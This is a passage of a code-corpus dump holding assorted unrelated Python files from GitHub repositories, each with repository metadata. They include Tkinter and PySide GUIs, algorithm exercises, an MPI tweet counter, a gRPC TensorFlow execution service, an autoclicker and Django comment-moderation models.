\"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"Green\")\n dev_lib6.grid(row=2, column=5, padx=10, pady=10, sticky=W)\n\n\nif __name__ == \"__main__\":\n root = Tk()\n obj = Developer(root)\n root.mainloop()\n","repo_name":"Erakhileshkiot2000/CAMS-by-Face-recognition","sub_path":"developer.py","file_name":"developer.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72715274019","text":"import unittest\n\nimport numpy as np\n\nimport daps.utils.segment as segment\n\n\nclass test_segment_utilities(unittest.TestCase):\n def test_format(self):\n # Test d2b\n boxes = np.array([[10, 3], [5, 7]])\n bsol = np.array([[10, 12], [5, 11]])\n bout = segment.format(boxes, 'd2b')\n np.testing.assert_array_equal(bout, bsol)\n # Test b2c\n boxes = bout.copy()\n bsol = np.array([[11, 3], [8, 7]])\n bout = segment.format(boxes, 'b2c')\n np.testing.assert_array_equal(bout, bsol)\n # Test c2b\n boxes = bout.copy()\n bsol = np.array([[10, 12], [5, 11]])\n bout = segment.format(boxes, 'c2b')\n np.testing.assert_array_equal(bout, bsol)\n\n def test_intersection(self):\n a = np.random.rand(1)\n b = np.array([[1, 10], [5, 20], [16, 25]])\n self.assertRaises(ValueError, segment.intersection, a, b)\n a = np.random.rand(100, 2)\n self.assertEqual((100, 3, 2), segment.intersection(a, b).shape)\n a = np.array([[5, 15]])\n gt_isegs = np.array([[[5, 10], [5, 15], [16, 15]]], dtype=float)\n np.testing.assert_array_equal(gt_isegs, segment.intersection(a, b))\n results = segment.intersection(a, b, True)\n self.assertEqual(2, len(results))\n self.assertEqual((a.shape[0], b.shape[0]), results[1].shape)\n\n def test_iou(self):\n a = np.array([[1, 10], [5, 20], [16, 25]])\n b = np.random.rand(1)\n self.assertRaises(ValueError, segment.iou, a, b)\n b = np.random.rand(100, 2)\n self.assertEqual((3, 100), segment.iou(a, b).shape)\n b = np.array([[1, 10], [1, 30], [10, 20], [20, 30]])\n rst = segment.iou(a, b)\n # segment is equal\n self.assertEqual(1.0, rst[0, 0])\n # segment is disjoined\n self.assertEqual(0.0, rst[0, 3])\n # segment is contained\n self.assertEqual(10.0/30, rst[2, 1])\n # segment to left\n self.assertEqual(5.0/16, rst[2, 2])\n # segment to right\n self.assertEqual(6/15.0, rst[2, 3])\n\n def test_nms_detection(self):\n boxes = np.array([[10, 13],\n [7, 11],\n [5, 7],\n [11, 12],\n [9, 15]])\n scores = np.arange(boxes.shape[0])[::-1]\n # No score, NMS by iou\n idx_sol = [4, 3, 1, 2]\n bout, sout = segment.non_maxima_supression(boxes, None, 0.5)\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # No score, NMS by overlap\n idx_sol = [4, 1, 2]\n bout, sout = segment.non_maxima_supression(boxes, None,\n measure='overlap')\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # With score, NMS by iou\n idx_sol = [0, 1, 2, 3]\n bout, sout = segment.non_maxima_supression(boxes, scores, 0.5)\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n # With score, NMS by overlap\n idx_sol = [0, 1, 2, 4]\n bout, sout = segment.non_maxima_supression(boxes, scores,\n measure='overlap')\n np.testing.assert_array_equal(bout, boxes[idx_sol, ...])\n","repo_name":"escorciav/daps","sub_path":"daps/utils/test/test_segment.py","file_name":"test_segment.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"34"} +{"seq_id":"9566003902","text":"import tkinter as tk\n\n\n#FUNCTIONS\n#calculation function\ndef calc_tax(stay_price, stay_length, minor_count, adult_count):\n\n\t#defining daily prices\n\tdaily_price = stay_price/stay_length\n\tdaily_price_per_capita = daily_price/(minor_count+adult_count)\n\n\t#making sure per capita price doesn't exceed 2.53 euros\n\tper_adult_tax = (0.03*daily_price_per_capita)*(1.1)\n\tif per_adult_tax>2.53:\n\t\tper_adult_tax = 2.53\n\n\tper_adult_tax = round(per_adult_tax, 2)\n\ttotal_tax = adult_count*per_adult_tax\n\treturn per_adult_tax, total_tax*stay_length\n\ndef give_result():\n\t#fetching user input\n\tstay_price = stay_price_var.get()\n\tstay_length = stay_length_var.get()\n\tminor_count = minor_count_var.get()\n\tadult_count = adult_count_var.get()\n\tprint(stay_price, stay_length, minor_count, adult_count)\n\t#making sure values are legal\n\tcan_calc=True\n\tif stay_price == 0:\n\t\tstay_price_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: stay_price_label[\"fg\"] = \"black\"\n\n\tif stay_length ==0:\n\t\tstay_length_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: stay_length_label[\"fg\"] = \"black\"\n\n\tif adult_count ==0:\n\t\tadult_count_label[\"fg\"] = \"red\"\n\t\tcan_calc=False\n\telse: adult_count_label[\"fg\"] = \"black\"\n\n\tif can_calc==False:return\n\n\tglobal total_tax_var\n\tglobal per_adult_tax_var\n\tprint(total_tax_var.get(), per_adult_tax_var.get())\n\ttax1, tax2 = calc_tax(stay_price, stay_length, minor_count, adult_count)\n\tper_adult_tax_var.set(\"{}€\".format(tax1))\n\ttotal_tax_var.set(\"{}€\".format(tax2))\n\tprint(total_tax_var.get(), per_adult_tax_var.get())\n\n\n\n#DEFINING GLOBAL VARIABLES\nTITLE = \"Outil de calcul pour la taxe de séjour.\"\n\n#SETTING UP THE WINDOW\nmain_window = tk.Tk()\nmain_window.title(TITLE)\nmain_window.grid_rowconfigure(0, weight=1)\nmain_window.grid_columnconfigure(0, weight=1)\n\n#DEFINING WIDGETS\n#title_label = tk.Label(main_window, text=TITLE)\n#defining stay vars\nstay_length_var= tk.IntVar()\nadult_count_var= tk.IntVar()\nminor_count_var = tk.IntVar()\nstay_price_var = tk.DoubleVar()\nper_adult_tax_var = tk.StringVar()\ntotal_tax_var = tk.StringVar()\n#making labels\nstay_length_label = tk.Label(main_window, text=\"Durée du séjour\")\nadult_count_label = tk.Label(main_window, text=\"Nombre d'adultes\")\nminor_count_label = tk.Label(main_window, text=\"Nombre d'enfants\")\nstay_price_label = tk.Label(main_window, text=\"Prix du séjour\", fg=\"black\")\nper_adult_tax_name_label = tk.Label(main_window, text=\"Prix unitaire par jour\")\ntotal_tax_name_label = tk.Label(main_window, text=\"Prix total pour le séjour\")\nper_adult_tax_label = tk.Label(main_window, textvariable=per_adult_tax_var)\ntotal_tax_label = tk.Label(main_window, textvariable=total_tax_var)\n#making entries\nstay_length_entry = tk.Entry(main_window, textvariable=stay_length_var, width=5)\nadult_count_entry = tk.Entry(main_window, textvariable=adult_count_var, width=5)\nminor_count_entry = tk.Entry(main_window, textvariable=minor_count_var, width=5)\nstay_price_entry = tk.Entry(main_window, textvariable=stay_price_var, width=5)\n#making buttons\nvalidate_button = tk.Button(text=\"Calculer\", command=give_result)\nquit_button = tk.Button(text=\"Quitter\", command=main_window.quit)\n\n#CREATING WIDGETS\n#packing labels\n#title_label.grid(row=1, column=1)\nstay_length_label.grid(row=2, column=1, padx=30, pady=5)\nadult_count_label.grid(row=3, column=1, padx=30, pady=5)\nminor_count_label.grid(row=4, column=1, padx=30, pady=5)\nstay_price_label.grid(row=5, column=1, padx=30, pady=5)\nper_adult_tax_name_label.grid(row=6, column=1, padx=30, pady=5)\ntotal_tax_name_label.grid(row=6, column=2, padx=30, pady=5)\nper_adult_tax_label.grid(row=7, column=1, padx=30, pady=5)\ntotal_tax_label.grid(row=7, column=2, padx=30, pady=5)\n#packing entries\nstay_length_entry.grid(row=2, column=2, padx=30, pady=5)\nadult_count_entry.grid(row=3, column=2, padx=30, pady=5)\nminor_count_entry.grid(row=4, column=2, padx=30, pady=5)\nstay_price_entry.grid(row=5, column=2, padx=30, pady=5)\n#packing buttons\nvalidate_button.grid(row=8, column=1)\nquit_button.grid(row=8, column=2)\n\n#RUNNING THE APP\nmain_window.mainloop()","repo_name":"s0lst1ce/calculateur-taxe-sejour","sub_path":"tax_UI.py","file_name":"tax_UI.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"22151938284","text":"# 76. 最小覆盖子串\n# 给你一个字符串 s 、一个字符串 t 。返回 s 中涵盖 t 所有字符的最小子串。如果 s 中不存在涵盖 t 所有字符的子串,则返回空字符串 \"\" 。\n\n# 注意:如果 s 中存在这样的子串,我们保证它是唯一的答案。\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/minimum-window-substring\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\nimport collections\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n targetDict=collections.defaultdict(int)\n for tt in t:\n targetDict[tt]+=1\n numDict = collections.defaultdict(int)\n fbe,fen,minDis = 0,0,float(\"inf\")\n begin,end=0,0\n def issuperset():\n for k in targetDict:\n if numDict[k] None:\n self.api = API()\n\n def test_get_phonenumbers(self):\n responses = self.api.get_phone_numbers(account_id=os.getenv('FACEBOOK_CLOUD_TEST_ACCOUNT_ID'))\n\n for response in responses:\n print(response.json())\n self.assertIs(response.status_code, 200)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KoterIA/FacebookCloudAPI","sub_path":"tests/v13/phone_numbers.py","file_name":"phone_numbers.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23526412486","text":"\"\"\"11729 하노이 탑 이동 순서\"\"\"\n#\n#\n# def count(start, end):\n# global list_1\n# list_1.append(f\"{start} {end}\")\n#\n#\n# def hanoi(num, start=1, end=3):\n# if num == 0:\n# return\n#\n# # 출발도 도착지도 아닌 다른 기둥\n# other = 6 - end - start\n#\n# hanoi(num - 1, start, other)\n# count(start, end)\n# hanoi(num - 1, other, end)\n#\n#\n# # 경로를 저장할 리스트\n# list_1 = []\n#\n# # 원판의 개수를 받는다\n# num = int(input())\n#\n# hanoi(num)\n#\n# # 옮긴 횟수 출력\n# print(len(list_1))\n#\n# # 경로 출력\n# for i in list_1:\n# print(i)\n#\n# # ----------------------------------------------------------------------\n# \"\"\"다른 답안\"\"\"\n# n = int(input())\n#\n#\n# def hanoi_2(n, a, b, c):\n# if n == 1:\n# print(a, c)\n# else:\n# hanoi_2(n - 1, a, c, b)\n# print(a, c)\n# hanoi_2(n - 1, b, a, c)\n#\n#\n# sum = 1\n#\n# for i in range(n - 1):\n# sum = sum * 2 + 1\n#\n# print(sum)\n# hanoi_2(n, 1, 2, 3)\n\n######################################################################################\n\"\"\"2022.03.18 풀이\"\"\"\n\npath = []\n\n\ndef hanoi(num, start, mid, end):\n if num == 0:\n return\n\n hanoi(num - 1, start, end, mid)\n path.append([start, end])\n hanoi(num - 1, mid, start, end)\n\n\nnum = int(input())\nhanoi(num, 1, 2, 3)\nprint(len(path))\nfor start, end in path:\n print(start, end)\n","repo_name":"Kdelphinus/Python_study","sub_path":"Baekjoon/solve_step_by_step/21_recursion/7. 하노이 탑 이동 순서.py","file_name":"7. 하노이 탑 이동 순서.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71451803297","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nwith open(\"outputs.txt\") as f:\n lineList = f.readlines()\n\nx = []\ny = []\n\nfor line in lineList:\n arr = line.split(' ')\n x.append(int(arr[0]))\n y.append(float(arr[1]))\n\nconstLog = x[-1]*np.log(x[-1])/y[-1]\n\nx1 = np.arange(x[0], x[-1], x[1]-x[0])\ny1 = x1*np.log(x1)/constLog\n\nconstS = x[-1]*x[-1]/y[-1]\n\ny2 = x1*x1/constS\n\nplt.plot(x, y, 'b')\nplt.plot(x1, y2, 'r')\nplt.savefig(\"outputs5000.png\")","repo_name":"egorlw26/UniversityLabs","sub_path":"4Course/Semester1/AlgorithmsBenchmark/BenchCXXForGrahamScan/Bench.py","file_name":"Bench.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31795773889","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ============================================================================ #\n# File: search_mpi.py #\n# Author: Haidong Wang #\n# Student ID: 678725 #\n# Input: This program can receive one string parameter in the console, this #\n# parameter will be used to count it's frequency it appears in files. #\n# Output: The search result will be print in the console, along with the wall #\n# time that the program costs. #\n# Description: This is the program that search a csv file in parallel system. #\n# It can 1. find the frequency of given word, 2. find the top 10 popular #\n# users, 3. find the top 10 popular topics. #\n# ============================================================================ #\n\n\n# import some module used in this program.\nimport re\nimport sys\nfrom mpi4py import MPI\nfrom datetime import datetime\nfrom collections import Counter\n\n# ---------------------------------------------------------------------------- #\n\n\n# This function will divede a twitter file into a list of lines, the size of\n# the list is appointed by the parameter: piece_size.\ndef divide_file(file, piece_size = 1024 * 1024 * 50):\n # Divide file by lines. Each piece is default size.\n while True:\n file_lines = file.readlines(piece_size)\n if not file_lines:\n break\n yield file_lines\n\n# ---------------------------------------------------------------------------- #\n\n\n# Record the beginning time.\nprogram_start_time = datetime.now().timestamp()\n\n# Set the query word, if users input words from console, then replace it.\nquery = 'melbourne'\nif len(sys.argv) >= 2 and sys.argv[1]:\n query = sys.argv[1]\n\n# Initialize MPI variables.\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n# Set the path of twitter file, then open it.\npath = 'oneGTwitter.csv'\n# Open the file.\nwith open(path, 'r', encoding='utf-8') as twitter_file:\n\n # Only generate counters in the root.\n if rank == 0:\n sum_query = Counter()\n sum_users = Counter()\n sum_topic = Counter()\n\n parallel_time = 0\n\n # Divide large file into blocks\n for twitter_list in divide_file(twitter_file):\n # Do different tasks in different rank.\n if rank == 0:\n # Create a now twitter_chunks which is a list of list.\n twitter_chunks = [[] for _ in range(size)]\n for i, chunk in enumerate(twitter_list):\n twitter_chunks[i % size].append(chunk)\n else:\n # Do nothing is the rank isn't the root\n twitter_list = None\n twitter_chunks = None\n # Each rank get their data from scatter.\n local_chunk = comm.scatter(twitter_chunks, root=0)\n\n # Start record the time that program start running in parallel\n parallel_start_time = datetime.now().timestamp()\n\n # Create 3 counters to record statistical data.\n query_per_chunk = Counter()\n users_per_chunk = Counter()\n topic_per_chunk = Counter()\n\n # Search each line of chunk, update counters.\n for item in local_chunk:\n # This regex will find all 'query word' in one twitter.\n queryPerItem = re.findall(query, item.lower())\n # This regex will find all 'user'(start with @) in one twitter.\n usersPerItem = re.findall(r'(?<=@)\\w+', item.lower())\n # This regex will find all 'topic'(start with #) in one twitter.\n topicPerItem = re.findall(r'(?<=#)\\w+', item.lower())\n # Store the results in counters.\n query_per_chunk.update(queryPerItem)\n users_per_chunk.update(usersPerItem)\n topic_per_chunk.update(topicPerItem)\n\n # Start record the end time that program running in parallel\n parallel_end_time = datetime.now().timestamp()\n\n parallel_time += (parallel_end_time - parallel_start_time)\n\n # Gathering data as a tuple.\n local_data = (query_per_chunk, users_per_chunk, topic_per_chunk)\n combine_data = comm.gather(local_data, root=0)\n\n # Add counters from each chunk together at the root.\n if rank == 0:\n # Add data to global varibables\n for data_tuple in combine_data:\n sum_query.update(data_tuple[0])\n sum_users.update(data_tuple[1])\n sum_topic.update(data_tuple[2])\n\n#### The file is now been closed.\n\n# Record the end time.\nprogram_end_time = datetime.now().timestamp()\n\n# ---------------------------------------------------------------------------- #\n\n\n# Printing the data and formatting.\nif rank == 0:\n # Printing the result.\n dotFormat = 0\n print('\\n================= Word Frequency ==================')\n for (query, times) in sum_query.most_common():\n print(' ' + query + ' ', end='')\n dotFormat = 41 - len(str(times)) - len(query)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n print('\\n================== Top10 Users ====================')\n for (names, times) in sum_users.most_common(10):\n print(' @' + names + ' ', end='')\n dotFormat = 40 - len(str(times)) - len(names)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n print('\\n================== Top10 Topics ===================')\n for (topic, times) in sum_topic.most_common(10):\n print(' #' + topic + ' ', end='')\n dotFormat = 40 - len(str(times)) - len(topic)\n while dotFormat > 0:\n print('.', end='')\n dotFormat -= 1\n print(' %s times' % times)\n\n # Calculating the time of wall.\n duration_time = str(\"%.2f\" % (program_end_time - program_start_time))\n # Calculating the time of program running in the parallel process.\n parallel_time = str(\"%.2f\" % (parallel_time))\n print('\\n[ Time of wall : %s s ]' % duration_time)\n print('\\n[ Time of parallel : %s s ]' % parallel_time)\n","repo_name":"wanghdnku/COMP90024-Cloud-Computing","sub_path":"Assignment1/search_mpi.py","file_name":"search_mpi.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21387749500","text":"rabbits = 3\n\nn = [1,2,34,2,3,1,6,6,7,5]\n\na = 'tweak the problem when you see the glimpse of it see'\nlst = a.split(' ')\n\n\ndef find_wor(s):\n find_word = dict()\n for word in s:\n find_word.setdefault(word, 0)\n find_word[word] += 1\n return find_word\n\nprint(find_wor(lst))\n\ndef funct(list):\n d= {}\n for i in list:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n return d\n\nprint(funct(n))\n\n\n\nwhile rabbits >0:\n print(rabbits)\n rabbits = rabbits - 1\n\nlist = [1,23,-1,5]\nresult = 0\n\nfor i in list:\n if i < 0:\n break\n result += i\nprint(result)","repo_name":"dariakrav/my_python","sub_path":"my_programming/xec.py","file_name":"xec.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15624292780","text":"import codecs\nimport os\nimport re\n\nimport setuptools.dist\n\n\ndef read(*directories):\n pathname = os.path.abspath(os.path.dirname(__file__))\n\n return codecs.open(os.path.join(pathname, *directories), \"r\").read()\n\n\ndef find_version(*pathnames):\n data = read(*pathnames)\n\n matched = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", data, re.M)\n\n if matched:\n return matched.group(1)\n\n raise RuntimeError(\"Unable to find version string.\")\n\n\n__version__ = find_version(\"prokaryote\", \"__init__.py\")\n\nsetuptools.setup(\n author=\"Allen Goodman\",\n author_email=\"allen.goodman@icloud.com\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Java\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Image Recognition\",\n \"Topic :: Scientific/Engineering\"\n ],\n license=\"BSD\",\n name=\"prokaryote\",\n package_data={\n \"prokaryote\": [\n \"prokaryote-{}.jar\".format(__version__)\n ]\n },\n packages=setuptools.find_packages(),\n python_requires=\">=2.7, <4\",\n url=\"https://github.com/CellProfiler/prokaryote\",\n version=__version__,\n zip_safe=False\n)\n","repo_name":"CellProfiler/prokaryote","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"73880943136","text":"import sys\n\ndef cifrar_cesar(texto, corrimiento):\n texto_cifrado = \"\"\n for caracter in texto:\n if caracter.isalpha():\n mayuscula = caracter.isupper()\n caracter = caracter.lower()\n codigo_ascii = ord(caracter)\n codigo_cifrado = ((codigo_ascii - ord('a') + corrimiento) % 26) + ord('a')\n if mayuscula:\n caracter_cifrado = chr(codigo_cifrado).upper()\n else:\n caracter_cifrado = chr(codigo_cifrado)\n else:\n caracter_cifrado = caracter\n texto_cifrado += caracter_cifrado\n return texto_cifrado\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Uso: python3 cesar.py \")\n sys.exit(1)\n\n texto_original = sys.argv[1]\n corrimiento = int(sys.argv[2])\n\n texto_cifrado = cifrar_cesar(texto_original, corrimiento)\n print(texto_cifrado)\n\n","repo_name":"nicowarrr/Lab1","sub_path":"cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24424485209","text":"\r\nfrom PySide6.QtWidgets import QApplication, QMainWindow\r\nfrom PySide6.QtGui import QIcon\r\nimport sys\r\n\r\n\r\n\r\n\r\nclass Window(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n\r\n self.setGeometry(100,100,500,500)\r\n self.setWindowTitle(\"Satislar\")\r\n self.setWindowIcon(QIcon('icons/qt.png'))\r\n self.setStyleSheet('background-color:blue')\r\n self.setWindowOpacity(0.7)\r\n\r\n\r\napp = QApplication([])\r\nwindow = Window()\r\nwindow.show()\r\nsys.exit(app.exec())\r\n\r\n\r\n\r\n","repo_name":"NamigRustamov/PragmaticFoundationProject","sub_path":"secwindow.py","file_name":"secwindow.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26323754374","text":"import io\nimport queue\nfrom collections import deque\nimport threading\nimport sys\nfrom typing import Iterator\nimport re\nimport contextlib\nimport tensorflow as tf\nfrom .proto import rtf_pb2, rtf_pb2_grpc\n\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\nclass Builder:\n\n HEADER = (\n \"import tensorflow as tf\\n\"\n \"import sys\\n\\n\"\n # \"@tf.function\\n\"\n \"def f():\\n\"\n )\n FOOTER = \"\\nf()\\n\"\n\n def __init__(self):\n self._statements = []\n self._indent_re = re.compile(r\"^(\\s*)\")\n\n def _flush_stdout(self, stmt):\n # TODO: convert stmt to AST or other structure.\n # Understand if print is a function call or not\n # and if it is a call, then add the flush()\n # The current solution is unsafe.\n if \"tf.print(\" in stmt and not \"output_stream\" in stmt:\n stmt = rreplace(stmt, \")\", \", output_stream=sys.stdout)\", -1)\n if \"print(\" in stmt:\n indent = self._indent_re.search(stmt)[0]\n stmt += f\"\\n{indent}sys.stdout.flush()\"\n\n return stmt\n\n def build(self, stmt):\n # TODO: check stmt correctness using its AST or other structure.\n stmt = self._flush_stdout(stmt)\n self._statements.append(stmt)\n\n def __call__(self):\n source = Builder.HEADER\n for stmt in self._statements:\n source += f\" {stmt}\\n\"\n source += Builder.FOOTER\n f = compile(source, \"useless\", \"exec\")\n return eval(f)\n\n\nclass DoubleIO(io.StringIO):\n def __init__(self, initial_value=\"\", newline=\"\\n\"):\n super().__init__(initial_value, newline)\n self._lines = deque()\n self._buffer = []\n\n def flush(self):\n self._lines.append(\"\".join(self._buffer))\n self._buffer.clear()\n\n def write(self, s):\n self._buffer.append(s)\n\n def close(self):\n super().close()\n\n def readline(self):\n return self._lines.popleft()\n\n\nclass RTFServicer(rtf_pb2_grpc.RTFServicer):\n \"\"\"Remote TensorFlow (RTF) gRPC service provider.\"\"\"\n\n def DefineAndCall(self, request_iterator, context) -> Iterator[rtf_pb2.RTFResponse]:\n builder = Builder()\n for statement in request_iterator:\n builder.build(statement.stmt)\n\n fp = DoubleIO()\n stop = False\n response_q = queue.Queue()\n\n def executor():\n with contextlib.redirect_stdout(fp):\n output_value = builder()\n fp.close()\n\n response = rtf_pb2.RTFResponse()\n if output_value:\n response.body = bytes(output_value)\n response.status = True\n response_q.put(response)\n stop = True\n\n def stdout_sender():\n while not fp.closed:\n try:\n line = fp.readline()\n response = rtf_pb2.RTFResponse()\n response.stdout = line\n response.status = True\n response_q.put(response)\n except IndexError as e:\n pass\n\n threads = [\n threading.Thread(target=stdout_sender),\n threading.Thread(target=executor),\n ]\n for thread in threads:\n thread.start()\n\n while True:\n if stop:\n while not response_q.empty():\n yield response_q.get()\n break\n yield response_q.get()\n","repo_name":"galeone/rtf","sub_path":"rtf/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"15482077860","text":"import json\nfrom shared.games_manager import GamesManager\nfrom request_response import *\n\n## NOT WORKING: \"'PlayerEvents' object has no attribute 'query_events_for_player'\"\n\ndef lambda_handler(event, context):\n req = RequestRespond(event)\n games_manager = GamesManager()\n game_id = req.params['game_id']\n player_id = req.params['player_id']\n \n if not (\n games_manager.game_exists(game_id)\n and games_manager.player_exists(game_id, player_id)\n ):\n return NOT_ACCEPTABLE\n\n if req.method == \"GET\":\n return (\n req.make_response({\"events\": games_manager.get_player_events(game_id, player_id)})\n )\n else:\n return METHOD_NOT_ALLOWED\n","repo_name":"JonathanFoo0523/extreme_startup_scaled","sub_path":"lambda-api-endpoint/player_events/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41772929960","text":"import time\r\nimport threading\r\nfrom pynput.mouse import Controller, Button\r\nfrom pynput.keyboard import Listener, KeyCode\r\n\r\n#key to set the autoclicker to on/off.\r\nTOOGLE_KEY = KeyCode(char=\"p\")\r\n\r\n#normal state of condition (false, the autoclicker is off)\r\nclicking = False\r\nmouse = Controller()\r\n\r\n#activate autoclicker\r\ndef clicker():\r\n while True:\r\n if clicking:\r\n mouse.click(Button.left, 1)\r\n time.sleep(0.0001)\r\n\r\n#deactivate clicker\r\ndef toggle_event(key):\r\n if key == TOOGLE_KEY:\r\n global clicking\r\n clicking = not clicking\r\n\r\nclick_thred = threading.Thread(target=clicker)\r\nclick_thred.start()\r\n\r\nwith Listener(on_press=toggle_event) as Listener:\r\n Listener.join()","repo_name":"LucianBell/Autoclick.py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18722007927","text":"import datetime\nimport md5\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models import permalink\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.auth.models import User\n\nfrom savoy.core.people.models import Person\nfrom savoy.core.media.models import FlickrUser\nfrom savoy.contrib.comments.managers import *\n\nclass NameBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n name = models.CharField(max_length=250)\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.name\n\n\nclass EmailBlacklistItem(models.Model):\n \"\"\"\n The email blacklist is a list of author email addresses to reject comments from.\n \"\"\"\n email_address = models.EmailField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.email_address\n\n\nclass IPBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n ip_address = models.IPAddressField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.ip_address\n\n\nclass URLBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n url = models.URLField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.url\n\n\nclass EmailWhitelistItem(models.Model):\n \"\"\"\n The email whitelist is a list of author email addresses to blindly accept comments from.\n \"\"\"\n email_address = models.EmailField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.email_address\n\n\nclass Comment(models.Model):\n content_type = models.ForeignKey(ContentType)\n object_id = models.IntegerField()\n content_object = generic.GenericForeignKey()\n person = models.ForeignKey(Person, blank=True, null=True)\n author_name = models.CharField(max_length=150)\n author_email_address = models.EmailField(max_length=250)\n author_email_address_hash = models.CharField(max_length=250, blank=True, null=True)\n author_url = models.URLField(blank=True, null=True)\n author_ip_address = models.IPAddressField()\n author_user_agent_string = models.CharField(max_length=250, blank=True)\n title = models.CharField(blank=True, max_length=250)\n body = models.TextField()\n featured = models.BooleanField(default=False)\n trollish = models.BooleanField(default=False)\n approved = models.BooleanField(default=False)\n whitelisted = models.BooleanField(default=False)\n blacklisted = models.BooleanField(default=False)\n failed_akismet = models.BooleanField(default=False)\n completed_spam_check = models.BooleanField(default=False)\n date_submitted = models.DateTimeField(default=datetime.datetime.now)\n objects = models.Manager()\n approved_comments = ApprovedCommentManager()\n orphaned_comments = OrphanedCommentManager()\n featured_comments = FeaturedCommentManager()\n exclude_flickr_favorites = NonFlickrFavoriteApprovedCommentManager()\n \n def __unicode__(self):\n return \"%s: %s...\" % (self.author_name, self.body[:50])\n \n def is_flickr_comment(self):\n \"\"\" Returns True if this comment was imported from Flickr. \"\"\"\n if FlickrComment.objects.get(comment=self):\n return True\n else:\n return False\n\n def source(self):\n \"\"\" Returns a string representation of the source for this comment (i.e. 'flickr' or 'local'). \"\"\"\n if self.is_flickr_comment():\n return \"flickr\"\n else:\n return \"local\"\n\n @permalink\n def get_absolute_url(self):\n \"\"\"\n Returns the absolute URL to the comment: the URL of the object it's attached to, plus and anchor.\n \"\"\"\n try:\n return '%s#c%s' % (self.parent_object().get_absolute_url(), self.id)\n except AttributeError:\n return \"\"\n \n def parent_object(self):\n \"\"\"\n Returns the object that this is a comment on. If that item is another comment\n (in the case of threaded comments), keeps going up the chain until it find a \n parent object that is another ContentType.\n \"\"\"\n from django.core.exceptions import ObjectDoesNotExist\n try:\n if self.content_type == ContentType.objects.get_for_model(Comment):\n return self.content_object.parent_object()\n else:\n return self.content_type.get_object_for_this_type(pk=self.object_id)\n except ObjectDoesNotExist:\n return 